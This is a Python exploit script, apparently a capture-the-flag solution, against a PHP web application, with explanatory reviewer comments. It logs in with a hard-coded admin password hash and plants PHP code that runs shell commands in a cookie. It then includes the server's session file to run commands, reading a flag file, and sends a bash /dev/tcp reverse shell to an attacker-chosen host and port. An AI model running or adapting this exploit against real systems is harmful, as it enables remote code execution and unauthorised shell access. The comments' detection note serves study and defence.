#!/usr/bin/env python3
import argparse
import os
import sys
import time

import requests

# User Arguments
# Three required flags; the parser exits with usage text if any is missing.
parser = argparse.ArgumentParser()
parser.add_argument(
    '-u', '--url',
    type=str,
    help='URL of the vulnerable application',
    required=True,
)
parser.add_argument(
    '-lh', '--lhost',
    type=str,
    help='LHOST IP on which the reverse shell will be sent',
    required=True,
)
parser.add_argument(
    '-lp', '--lport',
    type=int,
    help='LPORT on which the reverse shell will be sent',
    required=True,
)
args = parser.parse_args()

# Setting argumented variable
# Module-level values read by the functions below; lport is already an int
# via type=int, the explicit cast just mirrors the original.
BASE_URL, LHOST, LPORT = args.url, args.lhost, int(args.lport)

# Basic session for working exploitation
# One shared Session so cookies set by /authenticate.php persist across calls.
s = requests.Session()
def search(cookie , phpsess):
    """Trigger the session-file inclusion twice: once to read the flag, once for the shell.

    Both POSTs to /home.php carry ``search`` pointing at the PHP session file
    for *phpsess* and ``c`` holding a shell command. Presumably the application
    stores the ``user_pref`` cookie (set in login()) in that session file and
    then includes whatever path ``search`` names, so the embedded
    ``system($_REQUEST['c'])`` runs — confirm against the target's source.
    Called only from login().

    Detection note: the request pattern is distinctive — a ``search`` value of
    ``/var/lib/php/sessions/sess_<PHPSESSID>`` combined with a ``c`` parameter,
    and a ``user_pref`` cookie containing ``<?php``.

    Args:
        cookie: dict of cookies to send (PHPSESSID plus the user_pref payload).
        phpsess: PHPSESSID value, used only to build the session-file path.

    Raises:
        IndexError: if the response body lacks the ``:"…";`` pattern the flag
            parser below expects.
        requests.exceptions.RequestException: on connection failure, including
            when nothing listens on the hard-coded 127.1:8080 proxy.
    """
    dataReq = {'search': f'/var/lib/php/sessions/sess_{phpsess}', 'c':'cat /tmp/flag.txt' }
    print('[+] Payload sent')
    # First POST: per the original comment, sent only so the cookie value is
    # written server-side; its response is discarded.
    requests.post(BASE_URL + '/home.php' , cookies=cookie, data=dataReq) # Dummy request to change the value of the cookie
    time.sleep(1) # sleep for waiting for the update change
    # Hard-coded local intercept proxy (127.1 resolves to 127.0.0.1); only the
    # next request is routed through it, the other two go direct.
    proxy = {'http':'http://127.1:8080','https':'http://127.1:8080'}
    searchReq = requests.post(BASE_URL + '/home.php' , cookies=cookie, data=dataReq , proxies=proxy)
    print('[+] Retrieving flag')
    # Flag extraction assumes the body has at least two ':"' occurrences and
    # takes the text after the second one up to the following '";' — tied to
    # this one application's exact response layout.
    flag = searchReq.text.split(':"')[2].split('";')[0]
    print('[*] FLAG => ' + flag)
    print('[+] Starting process of getting a reverse shell')
    # Same inclusion, different command: the value of ``c`` is the bash
    # /dev/tcp reverse-shell one-liner aimed at LHOST:LPORT.
    dataRev = {'search': f'/var/lib/php/sessions/sess_{phpsess}', 'c': f'bash -c "bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1"' }
    print(f'[-] (LISTENER)=> Run # nc -lnvp {LPORT}')
    # Blocks until the operator confirms the listener is up.
    input('[*] Press Enter to get reverse shell')
    print('[++++++++] Reverse shell sent check Listener')
    # NOTE(review): this POST goes through the module-level Session ``s`` while
    # the two above use bare requests.post; the explicit cookies= argument is
    # what carries the session either way.
    s.post(BASE_URL + '/home.php' , cookies=cookie , data=dataRev)
def login():
    """Authenticate as admin, then hand the session id and payload cookie to search().

    Reviewer notes: the ``password`` field is sent as a 64-hex-char digest
    rather than a plaintext, which suggests the application compares a
    client-supplied hash (confirm against the target) — a weakness in its own
    right, since the digest alone is then sufficient to log in. Success is
    inferred solely from an empty response body with redirects disabled; on any
    other body the function prints nothing and returns silently.
    """
    print('[+] Trying to Login %s' % (BASE_URL))
    # Hard-coded credential; the value looks like an unsalted SHA-256 hex
    # digest (64 hex chars) — verify before relying on that.
    loginparams = {'username':'admin','password':'8C6976E5B5410415BDE908BD4DEE15DFB167A9C873FC4BB8A81F6F2AB448A918'}
    # Redirects are not followed, so loginReq is the direct reply from
    # /authenticate.php and any Set-Cookie it carries lands in ``s``.
    loginReq = s.post(BASE_URL + '/authenticate.php' , data=loginparams , allow_redirects=False)
    if loginReq.text == '':
        print('[+] Login Successfully')
        # Stringifies the cookie dict and splits on quotes: index 3 is the
        # value of the FIRST cookie in the jar, which is PHPSESSID only if
        # nothing else was set before it. s.cookies.get('PHPSESSID') would be
        # the direct form.
        phpsessid = str(s.cookies.get_dict()).split("'")[3]
        print('[+] PHP session cookie: ' + phpsessid)
        # user_pref holds URL-encoded PHP ('+' = space, %3b = ';', %3f = '?'),
        # i.e. <?php system($_REQUEST['c']); ?>; the server side presumably
        # decodes it and persists it in the session file that search() includes.
        cookies = {'PHPSESSID':phpsessid , 'user_pref':"<?php+system($_REQUEST['c'])%3b+%3f>"}
        search(cookies , phpsessid)
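def main():
    """Script entry point: run the login step, which drives everything else.

    The original declared BASE_URL, LHOST and LPORT as ``global`` here, but
    this function never assigns them, so those declarations were no-ops and
    are dropped; login() and search() read the module-level values directly.
    """
    login()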
if __name__ == '__main__':
    # Run only when executed as a script, never on import; main() returns
    # None, so the process exits with status 0 exactly as before.
    sys.exit(main())